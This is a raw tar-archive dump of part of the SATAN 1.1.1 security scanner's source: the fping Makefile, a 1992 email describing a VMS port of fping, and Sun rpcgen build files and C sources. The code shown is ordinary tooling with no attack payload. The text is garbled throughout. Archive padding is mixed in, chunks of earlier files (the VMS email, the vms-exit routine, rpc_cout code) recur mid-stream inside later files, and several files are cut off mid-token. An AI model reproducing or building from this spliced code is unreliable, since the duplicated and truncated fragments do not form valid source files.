p->prev->next = p; p->next->prev = p; rrlist = p; } num_hosts++; } #ifdef _NO_PROTO void remove_jsatan-1.1.1/src/fping/Makefile...................................................................... 600 . 465 . 506 . 2077 5734763532 11247. ........................................................................................ ................................................................................................................................................................................................................................................................. ........... PROG= ../../bin/fping OBJS= fping.o SRC= fping.c BIN= /usr/local/bin MAN= /usr/man/manl MANSRC= fping.man MANDST= fping.l # # Interval is the minimum amount of time between sending a ping packet to # any host. # # Timeout is the minimum amount of time between sending a ping packet to # a particular host. # # Retry is the number of ping packets to send to a host before giving up. # DEFAULTS= -DDEFAULT_INTERVAL=25 \ -DDEFAULT_TIMEOUT=2500 \ -DDEFAULT_RETRY=3 # # some systems need the following: # #LIBS= -lsocket LIBS= all: $(PROG) $(PROG) : $(OBJS) .$(CC) $(OBJS) -o $(PROG) $(LIBS) $(OBJS) : $(SRC) .$(CC) $(CFLAGS) -c $(DEFAULTS) $(SRC) # if you don't have install type: # cp $(PROG) /usr/local/bin # chown root /usr/local/bin/$(PROG) # chmod 4555 /usr/local/bin/$(PROG) # strip /usr/local/bin/$(PROG) # install: .install -c -m 4555 -o root -s $(PROG) $(BIN)/$(PROG) .install -c -m 0444 -o root $(MANSRC) $(MAN)/$(MANDST) clean: .rm -f a.out core *~ *.o $(PROG) shar: .shar README CHANGES fping.c fping.man Makefile README.VMS > fping.shar al/bin MAN= /usr/man/manl MANSRC= fping.man MANDST= fping.l # # Interval is the minimum amount of time between sending a ping packet to # any host. # # Timeout is the minimum amount of time between sending a ping packet to # a particular host. # # Retry is the number of ping packets to send to a host before giving up. # DEFAULTS= -DDEFAULT_INTERVAL=25 \ -DDEFAULT_TIMEOUT=2500 \ -DDEFAULT_RETRY=3 # # some systems need thsatan-1.1.1/src/fping/README.VMS.................................................................... 600 . 465 . 506 . 12606 5731724671 11150. ............................................................................... ................................................................................................................................................................................................................................................................. ....................From <@jessica.stanford.edu:IVERSEN@VSFYS1.FI.UIB.NO> Mon Jul 27 08:54:26 1992 Received: from Argus.Stanford.EDU by jessica.stanford.edu (5.59/25-eef) id AA28695; Mon, 27 Jul 92 08:54:22 PDT Received: from vsfys1.fi.uib.no by Argus.Stanford.EDU (5.65/inc-1.0) .id AA28942; Mon, 27 Jul 92 08:54:19 -0700 Date: Mon, 27 Jul 1992 17:54:17 +0200 From: IVERSEN@VSFYS1.FI.UIB.NO (Per Steinar Iversen, Dept. of Physics, Univ. of Bergen, Norway, phone +47-5-212770) Message-Id: <920727175417.21e004ce@VSFYS1.FI.UIB.NO> Subject: FPING under VMS To: schemers@Stanford.EDU X-Vmsmail-To: SMTP%"schemers@Stanford.EDU" Status: OR Hello, I rather liked your recently posted fping, and I decided to port it to VMS, under MultiNet TCP/IP 3.0H and VAXC 3.2. Only some very minor modifications are necessary to run it under VMS 5.5: 1) The 2 following lines must be put onto one single line, otherwise VAXC complains: #if !__STDC__ && !defined(__cplusplus) && !defined(FUNCPROTO) \ && !defined(_POSIX_SOURCE) goes to: #if !__STDC__ && !defined(__cplusplus) && !defined(FUNCPROTO) && !defined(_POSIX_SOURCE) 2) The single following line must be changed: extern char *sys_errlist[]; to: #ifndef VMS extern char *sys_errlist[]; #else extern noshare char *sys_errlist[]; #endif 3) VMS runs privileged programs in a different manner from UNIX. geteuid is "supported" by VAXC but the result is not really meaningful. These lines are thus Unix specific: /* check if we are root */ #ifndef VMS if (geteuid()) { fprintf(stderr, "This program can only be run by root, or it must be setuid root.\n"); exit(3); } #endif 4) VAXC does not support getopt. I got my copies of getopt, index and rindex from a fileserver with bsd-sources, using anonymous FTP. These routines compiled without complaints and works fine under VAXC 3.2 at least. 5) The VMS concept of exit codes is different from the Unix version. After some thought I decided to short circuit the VAXC attempt of translating the Unix return codes into VMS style return codes. My version of FPING always returns "exit(1)", which is VMS success. However the FPING status codes are put into a VMS symbol, FPING_STATUS. It is thus very easy to use the FPING return status codes for further action if needed. The line at the end of main in FPING, "return 0;", must be changed to "exit(0);" for VMS, this should be OK for Unix too? A small routine is needed to handle the translation, it will probably not get any rewards for nice C-code (I usually program in Fortran), and it was largely created by copying an example from the VAXC manuals: /* VMS-EXIT.C */ #include <ssdef> #include <stdio> #include <descrip> int LIB$SET_SYMBOL(); vms_exit (ecode) int ecode; { int status = 1; static $DESCRIPTOR(fping_name, "FPING_STATUS"); static $DESCRIPTOR(fping_exit_0,"0"); static $DESCRIPTOR(fping_exit_1,"1"); static $DESCRIPTOR(fping_exit_2,"2"); static $DESCRIPTOR(fping_exit_3,"3"); static $DESCRIPTOR(fping_exit_4,"4"); static $DESCRIPTOR(fping_exit_5,"5"); switch(ecode) { case 0 : status = LIB$SET_SYMBOL(&fping_name,&fping_exit_0); break; case 1 : status = LIB$SET_SYMBOL(&fping_name,&fping_exit_1); break; case 2 : status = LIB$SET_SYMBOL(&fping_name,&fping_exit_2); break; case 3 : status = LIB$SET_SYMBOL(&fping_name,&fping_exit_3); break; case 4 : status = LIB$SET_SYMBOL(&fping_name,&fping_exit_4); break; default: status = LIB$SET_SYMBOL(&fping_name,&fping_exit_5); break; } exit(1); } 6) The following command file (script) was used to compile and link under VMS: $! VMS-CC-MAKE.COM $! $! This compile+link procedure has been tested with VAXC 3.2 and $! MultiNet 3.0H. $! $! NOTE: getopt, index, and rindex are not part of VAXC, however the BSD $! versions works fine. They should be available by anonymous FTP $! from a number of fileservers. $! $ define/user arpa multinet_root:[multinet.include.arpa] $ define/user netinet multinet_root:[multinet.include.netinet] $ define/user sys multinet_root:[multinet.include.sys],sys$library $ cc /nolist /define="exit=vms_exit" fping.c $ cc /nolist vms-exit.c $ cc /nolist getopt.c $ cc /nolist index.c $ cc /nolist rindex.c $ link /nomap/notrace fping,vms-exit,getopt,index,rindex,sys$input/opt multinet:multinet_socket_library/share sys$share:vaxcrtl/share $ delete fping.obj.*,vms-exit.obj.*,getopt.obj.*,index.obj.*,rindex.obj.* $ purge fping.exe $ fping :== $'f$environment("default")'fping 7) Piping files into fping is not available under VMS, but the "f" option does the same job. 8) fping must be installed with privileges if it is to be used by non-privileged users under VMS. The question then is, does it work? Well, as far I can see the answer is yes! Here are some examples of output: $ fping xxx xxx address not found $ show symbol fping_status FPING_STATUS = "2" $ fping vxcrna.cern.ch vxcrna.cern.ch is alive $ show symbol fping_status FPING_STATUS = "0" $ fping -de vxcrna.cern.ch vxcrna.cern.ch is alive (320 msec) $ show symbol fping_status FPING_STATUS = "0" $ fping -v vsfys5$dkb100:[scratch.iversen]fping.exe;7: $Revision: 1.17 $ $Date: 1992/07/23 03:29:42 $ vsfys5$dkb100:[scratch.iversen]fping.exe;7: comments to schemers@Stanford.EDU Regards, Per (iversen@vsfys1.fi.uib.no) for Unix too? A small routine is needed to handle the translation, it will probably not get any rewards for nice C-code satan-1.1.1/src/fping/AUTHOR........................................................................ 600 . 465 . 506 . 116 5735575504 10505. ..................................................................... ................................................................................................................................................................................................................................................................. .............................. Bob Morgan, morgan@networking.stanford.edu, is currently maintaining fping. YMBOL(&fping_name,&fping_exit_0); break; case 1 : status = LIB$SET_SYMBOL(&fping_name,&fping_exit_1); break; case 2 : status = LIB$SET_SYMBOL(&fping_name,&fping_exit_2); break; case 3 : status = LIB$SET_SYMBOL(&fping_name,&fping_exit_3); break; case 4 : status = LIB$SET_SYMBOL(&fping_name,&fping_exit_4); break; default: status = LIB$SET_SYMBOL(&fping_name,&fping_exit_5); break;satan-1.1.1/src/rpcgen/............................................................................. 700 . 465 . 506 . 0 5742521557 7663. ........................................................................................... ................................................................................................................................................................................................................................................................. ........satan-1.1.1/src/rpcgen/Makefile..................................................................... 600 . 465 . 506 . 2245 5741520414 11403. ............................................................................................. ................................................................................................................................................................................................................................................................. ......# # @(#)Makefile.2.1 88/08/01 4.0 RPCSRC # # Makefile for rpc protocol compiler # Copyright (C) 1987, Sun Microsystems, Inc. # SRCS= rpc_main.c rpc_hout.c rpc_cout.c rpc_parse.c rpc_scan.c rpc_util.c \ .rpc_svcout.c rpc_clntout.c HDRS= rpc_util.h rpc_parse.h rpc_scan.h OBJS= rpc_main.o rpc_hout.o rpc_cout.o rpc_parse.o rpc_scan.o rpc_util.o \ .rpc_svcout.o rpc_clntout.o GOAL=../../bin/rpcgen CFLAGS = -O $(XFLAGS) $(GOAL): $(OBJS) .$(CC) $(CFLAGS) $(OBJS) -o $@ lint: $(SRCS) $(HDRS) .lint $(SRCS) clean: .rm -f $(GOAL) $(OBJS) rpc_clntout.o: rpc_clntout.c rpc_clntout.o: rpc_parse.h rpc_clntout.o: rpc_util.h rpc_cout.o: rpc_cout.c rpc_cout.o: rpc_parse.h rpc_cout.o: rpc_util.h rpc_hout.o: rpc_hout.c rpc_hout.o: rpc_parse.h rpc_hout.o: rpc_util.h rpc_main.o: rpc_main.c rpc_main.o: rpc_parse.h rpc_main.o: rpc_scan.h rpc_main.o: rpc_util.h rpc_parse.o: rpc_parse.c rpc_parse.o: rpc_parse.h rpc_parse.o: rpc_scan.h rpc_parse.o: rpc_util.h rpc_scan.o: rpc_scan.c rpc_scan.o: rpc_scan.h rpc_scan.o: rpc_util.h rpc_svcout.o: rpc_parse.h rpc_svcout.o: rpc_svcout.c rpc_svcout.o: rpc_util.h rpc_util.o: rpc_parse.h rpc_util.o: rpc_scan.h rpc_util.o: rpc_util.c rpc_util.o: rpc_util.h vms-exit.c $ cc /nolist getopt.c $ cc /nolist index.c $ cc /nolist rindex.c $ link /nomap/notrace fping,vms-exit,getopt,index,rindex,sys$input/opt multinet:multinet_socket_library/share sys$share:vaxcrtl/share $ delete fping.obj.*,vms-exit.obj.*,getopt.obj.*,indesatan-1.1.1/src/rpcgen/rpc_clntout.c................................................................ 600 . 465 . 506 . 7051 5741525540 12450. ................................................ ................................................................................................................................................................................................................................................................. .................................................../* @(#)rpc_clntout.c.2.1 88/08/01 4.0 RPCSRC */ /* * Sun RPC is a product of Sun Microsystems, Inc. and is provided for * unrestricted use provided that this legend is included on all tape * media and as a part of the software program in whole or part. Users * may copy or modify Sun RPC without charge, but are not authorized * to license or distribute it to anyone else except as part of a product or * program developed by the user. * * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE. * * Sun RPC is provided with no support and without any obligation on the * part of Sun Microsystems, Inc. to assist in its use, correction, * modification or enhancement. * * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC * OR ANY PART THEREOF. * * In no event will Sun Microsystems, Inc. be liable for any lost revenue * or profits or other special, indirect and consequential damages, even if * Sun has been advised of the possibility of such damages. * * Sun Microsystems, Inc. * 2550 Garcia Avenue * Mountain View, California 94043 */ #ifndef lint static char sccsid[] = "@(#)rpc_clntout.c 1.2 87/06/24 (C) 1987 SMI"; #endif /* * rpc_clntout.c, Client-stub outputter for the RPC protocol compiler * Copyright (C) 1987, Sun Microsytsems, Inc. */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include "rpc_parse.h" #include "rpc_util.h" #define DEFAULT_TIMEOUT 25./* in seconds */ static write_program(); static printbody(); void write_stubs() { .list *l; .definition *def; .f_print(fout, .."\n/* Default timeout can be changed using clnt_control() */\n"); .f_print(fout, "static struct timeval TIMEOUT = { %d, 0 };\n", ..DEFAULT_TIMEOUT); .for (l = defined; l != NULL; l = l->next) { ..def = (definition *) l->val; ..if (def->def_kind == DEF_PROGRAM) { ...write_program(def); ..} .} } static write_program(def) .definition *def; { .version_list *vp; .proc_list *proc; .for (vp = def->def.pr.versions; vp != NULL; vp = vp->next) { ..for (proc = vp->procs; proc != NULL; proc = proc->next) { ...f_print(fout, "\n"); ...ptype(proc->res_prefix, proc->res_type, 1); ...f_print(fout, "*\n"); ...pvname(proc->proc_name, vp->vers_num); ...f_print(fout, "(argp, clnt)\n"); ...f_print(fout, "\t"); ...ptype(proc->arg_prefix, proc->arg_type, 1); ...f_print(fout, "*argp;\n"); ...f_print(fout, "\tCLIENT *clnt;\n"); ...f_print(fout, "{\n"); ...printbody(proc); ...f_print(fout, "}\n\n"); ..} .} } static char * ampr(type) .char *type; { .if (isvectordef(type, REL_ALIAS)) { ..return (""); .} else { ..return ("&"); .} } static printbody(proc) .proc_list *proc; { .f_print(fout, "\tstatic "); .if (streq(proc->res_type, "void")) { ..f_print(fout, "char "); .} else { ..ptype(proc->res_prefix, proc->res_type, 0); .} .f_print(fout, "res;\n"); .f_print(fout, "\n"); .f_print(fout, "\tmemset((char *)%sres, 0, sizeof(res));\n", ..ampr(proc->res_type)); .f_print(fout, .."\tif (clnt_call(clnt, %s, xdr_%s, argp, xdr_%s, %sres, TIMEOUT) != RPC_SUCCESS) {\n", ..proc->proc_name, stringfix(proc->arg_type), ..stringfix(proc->res_type), ampr(proc->res_type)); .f_print(fout, "\t\treturn (NULL);\n"); .f_print(fout, "\t}\n"); .if (streq(proc->res_type, "void")) { ..f_print(fout, "\treturn ((void *)%sres);\n", ...ampr(proc->res_type)); .} else { ..f_print(fout, "\treturn (%sres);\n", ampr(proc->res_type)); .} } ING_STATUS = "0" $ fping -de vxcrna.cern.ch vxcrna.cern.ch is alive (320 msec) $ show symbol fping_status FPING_STATUS = "0" $ fping -v vsfys5$dkb100:[scratch.iversen]fping.exe;7: $Revision: 1.17 $ $Date: 1992/07/23 03:29:42 $ vsfys5$dkb100:[scratch.iversen]fping.exe;7: comments to schemers@Stanford.EDU Regards, Per (iversen@vsfys1.fi.uib.no) for Unix too? A small routine is needed to handle the translation, it will probably not get any rewards for nice C-code satan-1.1.1/src/rpcgen/rpc_cout.c................................................................... 600 . 465 . 506 . 17160 5741731177 11761. ..................................................................... ................................................................................................................................................................................................................................................................. ............................../* @(#)rpc_cout.c.2.1 88/08/01 4.0 RPCSRC */ /* * Sun RPC is a product of Sun Microsystems, Inc. and is provided for * unrestricted use provided that this legend is included on all tape * media and as a part of the software program in whole or part. Users * may copy or modify Sun RPC without charge, but are not authorized * to license or distribute it to anyone else except as part of a product or * program developed by the user. * * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE. * * Sun RPC is provided with no support and without any obligation on the * part of Sun Microsystems, Inc. to assist in its use, correction, * modification or enhancement. * * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC * OR ANY PART THEREOF. * * In no event will Sun Microsystems, Inc. be liable for any lost revenue * or profits or other special, indirect and consequential damages, even if * Sun has been advised of the possibility of such damages. * * Sun Microsystems, Inc. * 2550 Garcia Avenue * Mountain View, California 94043 */ #ifndef lint static char sccsid[] = "@(#)rpc_cout.c 1.8 87/06/24 (C) 1987 SMI"; #endif /* * rpc_cout.c, XDR routine outputter for the RPC protocol compiler * Copyright (C) 1987, Sun Microsystems, Inc. */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include "rpc_util.h" #include "rpc_parse.h" static print_header(); static print_trailer(); static space(); static emit_enum(); static emit_union(); static emit_struct(); static emit_typedef(); static print_stat(); /* * Emit the C-routine for the given definition */ void emit(def) .definition *def; { .if (def->def_kind == DEF_PROGRAM || def->def_kind == DEF_CONST) { ..return; .} .print_header(def); .switch (def->def_kind) { .case DEF_UNION: ..emit_union(def); ..break; .case DEF_ENUM: ..emit_enum(def); ..break; .case DEF_STRUCT: ..emit_struct(def); ..break; .case DEF_TYPEDEF: ..emit_typedef(def); ..break; .} .print_trailer(); } static findtype(def, type) .definition *def; .char *type; { .if (def->def_kind == DEF_PROGRAM || def->def_kind == DEF_CONST) { ..return (0); .} else { ..return (streq(def->def_name, type)); .} } static undefined(type) .char *type; { .definition *def; .def = (definition *) FINDVAL(defined, type, findtype); .return (def == NULL); } static print_header(def) .definition *def; { .space(); .f_print(fout, "bool_t\n"); .f_print(fout, "xdr_%s(xdrs, objp)\n", def->def_name); .f_print(fout, "\tXDR *xdrs;\n"); .f_print(fout, "\t%s ", def->def_name); .if (def->def_kind != DEF_TYPEDEF || . !isvectordef(def->def.ty.old_type, def->def.ty.rel)) { ..f_print(fout, "*"); .} .f_print(fout, "objp;\n"); .f_print(fout, "{\n"); } static print_trailer() { .f_print(fout, "\treturn (TRUE);\n"); .f_print(fout, "}\n"); .space(); } static print_ifopen(indent, name) .int indent; .char *name; { .tabify(fout, indent); .f_print(fout, "if (!xdr_%s(xdrs", name); } static print_ifarg(arg) .char *arg; { .f_print(fout, ", %s", arg); } static print_ifsizeof(prefix, type) .char *prefix; .char *type; { .if (streq(type, "bool")) { ..f_print(fout, ", sizeof(bool_t), xdr_bool"); .} else { ..f_print(fout, ", sizeof("); ..if (undefined(type) && prefix) { ...f_print(fout, "%s ", prefix); ..} ..f_print(fout, "%s), xdr_%s", type, type); .} } static print_ifclose(indent) .int indent; { .f_print(fout, ")) {\n"); .tabify(fout, indent); .f_print(fout, "\treturn (FALSE);\n"); .tabify(fout, indent); .f_print(fout, "}\n"); } static space() { .f_print(fout, "\n\n"); } static print_ifstat(indent, prefix, type, rel, amax, objname, name) .int indent; .char *prefix; .char *type; .relation rel; .char *amax; .char *objname; .char *name; { .char *alt = NULL; .switch (rel) { .case REL_POINTER: ..print_ifopen(indent, "pointer"); ..print_ifarg("(char **)"); ..f_print(fout, "%s", objname); ..print_ifsizeof(prefix, type); ..break; .case REL_VECTOR: ..if (streq(type, "string")) { ...alt = "string"; ..} else if (streq(type, "opaque")) { ...alt = "opaque"; ..} ..if (alt) { ...print_ifopen(indent, alt); ...print_ifarg(objname); ..} else { ...print_ifopen(indent, "vector"); ...print_ifarg("(char *)"); ...f_print(fout, "%s", objname); ..} ..print_ifarg(amax); ..if (!alt) { ...print_ifsizeof(prefix, type); ..} ..break; .case REL_ARRAY: ..if (streq(type, "string")) { ...alt = "string"; ..} else if (streq(type, "opaque")) { ...alt = "bytes"; ..} ..if (streq(type, "string")) { ...print_ifopen(indent, alt); ...print_ifarg(objname); ..} else { ...if (alt) { ....print_ifopen(indent, alt); ...} else { ....print_ifopen(indent, "array"); ...} ...print_ifarg("(char **)"); ...if (*objname == '&') { ....f_print(fout, "%s.%s_val, (u_int *)%s.%s_len", .....objname, name, objname, name); ...} else { ....f_print(fout, "&%s->%s_val, (u_int *)&%s->%s_len", .....objname, name, objname, name); ...} ..} ..print_ifarg(amax); ..if (!alt) { ...print_ifsizeof(prefix, type); ..} ..break; .case REL_ALIAS: ..print_ifopen(indent, type); ..print_ifarg(objname); ..break; .} .print_ifclose(indent); } /* ARGSUSED */ static emit_enum(def) .definition *def; { .print_ifopen(1, "enum"); .print_ifarg("(enum_t *)objp"); .print_ifclose(1); } static emit_union(def) .definition *def; { .declaration *dflt; .case_list *cl; .declaration *cs; .char *object; .char *vectorfmt = "objp->%s_u.%s"; .char *format = "&objp->%s_u.%s"; .print_stat(&def->def.un.enum_decl); .f_print(fout, "\tswitch (objp->%s) {\n", def->def.un.enum_decl.name); .for (cl = def->def.un.cases; cl != NULL; cl = cl->next) { ..cs = &cl->case_decl; ..f_print(fout, "\tcase %s:\n", cl->case_name); ..if (!streq(cs->type, "void")) { ...object = alloc(strlen(def->def_name) + strlen(format) + .... strlen(cs->name) + 1); ...if (isvectordef(cs->type, cs->rel)) { ....s_print(object, vectorfmt, def->def_name, .....cs->name); ...} else { ....s_print(object, format, def->def_name, .....cs->name); ...} ...print_ifstat(2, cs->prefix, cs->type, cs->rel, cs->array_max, .... object, cs->name); ...free(object); ..} ..f_print(fout, "\t\tbreak;\n"); .} .dflt = def->def.un.default_decl; .if (dflt != NULL) { ..if (!streq(dflt->type, "void")) { ...f_print(fout, "\tdefault:\n"); ...object = alloc(strlen(def->def_name) + strlen(format) + .... strlen(dflt->name) + 1); ...if (isvectordef(dflt->type, dflt->rel)) { ....s_print(object, vectorfmt, def->def_name, .....dflt->name); ...} else { ....s_print(object, format, def->def_name, .....dflt->name); ...} ...print_ifstat(2, dflt->prefix, dflt->type, dflt->rel, .... dflt->array_max, object, dflt->name); ...free(object); ...f_print(fout, "\t\tbreak;\n"); ..} .} else { ..f_print(fout, "\tdefault:\n"); ..f_print(fout, "\t\treturn (FALSE);\n"); .} .f_print(fout, "\t}\n"); } static emit_struct(def) .definition *def; { .decl_list *dl; .for (dl = def->def.st.decls; dl != NULL; dl = dl->next) { ..print_stat(&dl->decl); .} } static emit_typedef(def) .definition *def; { .char *prefix = def->def.ty.old_prefix; .char *type = def->def.ty.old_type; .char *amax = def->def.ty.array_max; .relation rel = def->def.ty.rel; .print_ifstat(1, prefix, type, rel, amax, "objp", def->def_name); } static print_stat(dec) .declaration *dec; { .char *prefix = dec->prefix; .char *type = dec->type; .char *amax = dec->array_max; .relation rel = dec->rel; .char name[256]; .if (isvectordef(type, rel)) { ..s_print(name, "objp->%s", dec->name); .} else { ..s_print(name, "&objp->%s", dec->name); .} .print_ifstat(1, prefix, type, rel, amax, name, dec->name); } );\n"); .tabify(fout, indent); .f_print(fout, "}\n"); } static space() { .f_print(fout, "\n\n"); } static print_ifstat(indent, prefix, type, rel, amax, objname, name) .int indent; .char *prefix; .char *type; .relation rel; .char *amax; .char *objname; .char *name; { .char *alt = NULL; .switch (rel) { .case REL_POINTER: ..print_ifopen(indent, "pointer"); ..print_ifarg("(char **)"); ..f_print(fousatan-1.1.1/src/rpcgen/rpc_hout.c................................................................... 600 . 465 . 506 . 20313 5741525574 11762. ........................................................................................ ................................................................................................................................................................................................................................................................. .........../* @(#)rpc_hout.c.2.1 88/08/01 4.0 RPCSRC */ /* * Sun RPC is a product of Sun Microsystems, Inc. and is provided for * unrestricted use provided that this legend is included on all tape * media and as a part of the software program in whole or part. Users * may copy or modify Sun RPC without charge, but are not authorized * to license or distribute it to anyone else except as part of a product or * program developed by the user. * * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE. * * Sun RPC is provided with no support and without any obligation on the * part of Sun Microsystems, Inc. to assist in its use, correction, * modification or enhancement. * * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC * OR ANY PART THEREOF. * * In no event will Sun Microsystems, Inc. be liable for any lost revenue * or profits or other special, indirect and consequential damages, even if * Sun has been advised of the possibility of such damages. * * Sun Microsystems, Inc. * 2550 Garcia Avenue * Mountain View, California 94043 */ #ifndef lint static char sccsid[] = "@(#)rpc_hout.c 1.6 87/07/28 (C) 1987 SMI"; #endif /* * rpc_hout.c, Header file outputter for the RPC protocol compiler * Copyright (C) 1987, Sun Microsystems, Inc. */ #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <ctype.h> #include "rpc_util.h" #include "rpc_parse.h" static pconstdef(); static pstructdef(); static puniondef(); static pdefine(); static pprogramdef(); static penumdef(); static ptypedef(); static pdeclaration(); static undefined2(); /* * Print the C-version of an xdr definition */ void print_datadef(def) .definition *def; { .if (def->def_kind != DEF_CONST) { ..f_print(fout, "\n"); .} .switch (def->def_kind) { .case DEF_STRUCT: ..pstructdef(def); ..break; .case DEF_UNION: ..puniondef(def); ..break; .case DEF_ENUM: ..penumdef(def); ..break; .case DEF_TYPEDEF: ..ptypedef(def); ..break; .case DEF_PROGRAM: ..pprogramdef(def); ..break; .case DEF_CONST: ..pconstdef(def); ..break; .} .if (def->def_kind != DEF_PROGRAM && def->def_kind != DEF_CONST) { ..f_print(fout, "bool_t xdr_%s();\n", def->def_name); .} .if (def->def_kind != DEF_CONST) { ..f_print(fout, "\n"); .} } static pconstdef(def) .definition *def; { .pdefine(def->def_name, def->def.co); } static pstructdef(def) .definition *def; { .decl_list *l; .char *name = def->def_name; .f_print(fout, "struct %s {\n", name); .for (l = def->def.st.decls; l != NULL; l = l->next) { ..pdeclaration(name, &l->decl, 1); .} .f_print(fout, "};\n"); .f_print(fout, "typedef struct %s %s;\n", name, name); } static puniondef(def) .definition *def; { .case_list *l; .char *name = def->def_name; .declaration *decl; .f_print(fout, "struct %s {\n", name); .decl = &def->def.un.enum_decl; .if (streq(decl->type, "bool")) { ..f_print(fout, "\tbool_t %s;\n", decl->name); .} else { ..f_print(fout, "\t%s %s;\n", decl->type, decl->name); .} .f_print(fout, "\tunion {\n"); .for (l = def->def.un.cases; l != NULL; l = l->next) { ..pdeclaration(name, &l->case_decl, 2); .} .decl = def->def.un.default_decl; .if (decl && !streq(decl->type, "void")) { ..pdeclaration(name, decl, 2); .} .f_print(fout, "\t} %s_u;\n", name); .f_print(fout, "};\n"); .f_print(fout, "typedef struct %s %s;\n", name, name); } static pdefine(name, num) .char *name; .char *num; { .f_print(fout, "#define %s %s\n", name, num); } static puldefine(name, num) .char *name; .char *num; { .f_print(fout, "#define %s ((u_long)%s)\n", name, num); } static define_printed(stop, start) .proc_list *stop; .version_list *start; { .version_list *vers; .proc_list *proc; .for (vers = start; vers != NULL; vers = vers->next) { ..for (proc = vers->procs; proc != NULL; proc = proc->next) { ...if (proc == stop) { ....return (0); ...} else if (streq(proc->proc_name, stop->proc_name)) { ....return (1); ...} ..} .} .abort(); ./* NOTREACHED */ } static pprogramdef(def) .definition *def; { .version_list *vers; .proc_list *proc; .puldefine(def->def_name, def->def.pr.prog_num); .for (vers = def->def.pr.versions; vers != NULL; vers = vers->next) { ..puldefine(vers->vers_name, vers->vers_num); ..for (proc = vers->procs; proc != NULL; proc = proc->next) { ...if (!define_printed(proc, def->def.pr.versions)) { ....puldefine(proc->proc_name, proc->proc_num); ...} ...pprocdef(proc, vers); ..} .} } pprocdef(proc, vp) .proc_list *proc; .version_list *vp; { .f_print(fout, "extern "); .if (proc->res_prefix) { ..if (streq(proc->res_prefix, "enum")) { ...f_print(fout, "enum "); ..} else { ...f_print(fout, "struct "); ..} .} .if (streq(proc->res_type, "bool")) { ..f_print(fout, "bool_t *"); .} else if (streq(proc->res_type, "string")) { ..f_print(fout, "char **"); .} else { ..f_print(fout, "%s *", fixtype(proc->res_type)); .} .pvname(proc->proc_name, vp->vers_num); .f_print(fout, "();\n"); } static penumdef(def) .definition *def; { .char *name = def->def_name; .enumval_list *l; .char *last = NULL; .int count = 0; .f_print(fout, "enum %s {\n", name); .for (l = def->def.en.vals; l != NULL; l = l->next) { ..f_print(fout, "\t%s", l->name); ..if (l->assignment) { ...f_print(fout, " = %s", l->assignment); ...last = l->assignment; ...count = 1; ..} else { ...if (last == NULL) { ....f_print(fout, " = %d", count++); ...} else { ....f_print(fout, " = %s + %d", last, count++); ...} ..} ..f_print(fout, ",\n"); .} .f_print(fout, "};\n"); .f_print(fout, "typedef enum %s %s;\n", name, name); } static ptypedef(def) .definition *def; { .char *name = def->def_name; .char *old = def->def.ty.old_type; .char prefix[8];./* enough to contain "struct ", including NUL */ .relation rel = def->def.ty.rel; .if (!streq(name, old)) { ..if (streq(old, "string")) { ...old = "char"; ...rel = REL_POINTER; ..} else if (streq(old, "opaque")) { ...old = "char"; ..} else if (streq(old, "bool")) { ...old = "bool_t"; ..} ..if (undefined2(old, name) && def->def.ty.old_prefix) { ...s_print(prefix, "%s ", def->def.ty.old_prefix); ..} else { ...prefix[0] = 0; ..} ..f_print(fout, "typedef "); ..switch (rel) { ..case REL_ARRAY: ...f_print(fout, "struct {\n"); ...f_print(fout, "\tu_int %s_len;\n", name); ...f_print(fout, "\t%s%s *%s_val;\n", prefix, old, name); ...f_print(fout, "} %s", name); ...break; ..case REL_POINTER: ...f_print(fout, "%s%s *%s", prefix, old, name); ...break; ..case REL_VECTOR: ...f_print(fout, "%s%s %s[%s]", prefix, old, name, ....def->def.ty.array_max); ...break; ..case REL_ALIAS: ...f_print(fout, "%s%s %s", prefix, old, name); ...break; ..} ..f_print(fout, ";\n"); .} } static pdeclaration(name, dec, tab) .char *name; .declaration *dec; .int tab; { .char buf[8];./* enough to hold "struct ", include NUL */ .char *prefix; .char *type; .if (streq(dec->type, "void")) { ..return; .} .tabify(fout, tab); .if (streq(dec->type, name) && !dec->prefix) { ..f_print(fout, "struct "); .} .if (streq(dec->type, "string")) { ..f_print(fout, "char *%s", dec->name); .} else { ..prefix = ""; ..if (streq(dec->type, "bool")) { ...type = "bool_t"; ..} else if (streq(dec->type, "opaque")) { ...type = "char"; ..} else { ...if (dec->prefix) { ....s_print(buf, "%s ", dec->prefix); ....prefix = buf; ...} ...type = dec->type; ..} ..switch (dec->rel) { ..case REL_ALIAS: ...f_print(fout, "%s%s %s", prefix, type, dec->name); ...break; ..case REL_VECTOR: ...f_print(fout, "%s%s %s[%s]", prefix, type, dec->name, ....dec->array_max); ...break; ..case REL_POINTER: ...f_print(fout, "%s%s *%s", prefix, type, dec->name); ...break; ..case REL_ARRAY: ...f_print(fout, "struct {\n"); ...tabify(fout, tab); ...f_print(fout, "\tu_int %s_len;\n", dec->name); ...tabify(fout, tab); ...f_print(fout, "\t%s%s *%s_val;\n", prefix, type, dec->name); ...tabify(fout, tab); ...f_print(fout, "} %s", dec->name); ...break; ..} .} .f_print(fout, ";\n"); } static undefined2(type, stop) .char *type; .char *stop; { .list *l; .definition *def; .for (l = defined; l != NULL; l = l->next) { ..def = (definition 